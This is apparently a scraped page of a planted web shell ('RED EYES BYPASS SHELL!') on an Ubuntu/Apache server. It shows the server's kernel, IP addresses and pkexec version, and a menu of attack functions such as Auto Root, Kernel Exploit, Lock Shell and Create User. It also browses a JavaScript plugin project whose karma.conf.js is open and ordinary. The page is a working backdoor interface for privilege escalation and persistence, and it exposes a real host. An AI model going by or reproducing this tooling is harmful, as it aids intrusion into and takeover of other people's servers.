Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
plugin /
aos /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
demo
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.babelrc
70
B
-rwxr-xr-x
.editorconfig
208
B
-rwxr-xr-x
.gitattributes
222
B
-rwxr-xr-x
.gitignore
290
B
-rwxr-xr-x
.travis.yml
309
B
-rwxr-xr-x
CHANGELOG.md
1.41
KB
-rwxr-xr-x
CONTRIBUTING.md
1.23
KB
-rwxr-xr-x
LICENSE
1.06
KB
-rwxr-xr-x
README.md
9.74
KB
-rwxr-xr-x
bower.json
629
B
-rwxr-xr-x
karma.conf.js
1.3
KB
-rwxr-xr-x
package.json
1.49
KB
-rwxr-xr-x
postcss.config.js
66
B
-rwxr-xr-x
webpack.config.js
725
B
-rwxr-xr-x
yarn.lock
190.58
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : karma.conf.js
// Karma configuration // Generated on Mon Oct 19 2015 01:12:15 GMT+0200 (CEST) var isTravis = process.env.TRAVIS || false; var browsers = isTravis ? ['Chrome_travis_ci'] : ['Chrome']; var singleRun = isTravis; module.exports = function(config) { config.set({ basePath: '', browsers: browsers, frameworks: ['jasmine-jquery', 'jasmine'], files: [ 'node_modules/babel-polyfill/dist/polyfill.js', 'test/index.js', { pattern: 'test/fixtures/**/*.html', watched: true, included: false, served: true } ], preprocessors: { 'test/index.js': ['webpack'] }, webpack: { devtool: 'inline-source-map', module: { loaders: [{ test: /\.js?$/, exclude: [/bower_components/, /node_modules/], loader: 'babel' }, { test: /\.scss$/, loader: "css-loader?sourceMap!sass-loader" }] } }, plugins: [ 'karma-chrome-launcher', 'karma-jasmine-jquery', 'karma-jasmine', 'karma-webpack' ], reporters: ['dots'], customLaunchers: { Chrome_travis_ci: { base: 'Chrome', flags: ['--no-sandbox'] } }, port: 9876, singleRun: singleRun, colors: true, logLevel: config.LOG_WARN }) }
Close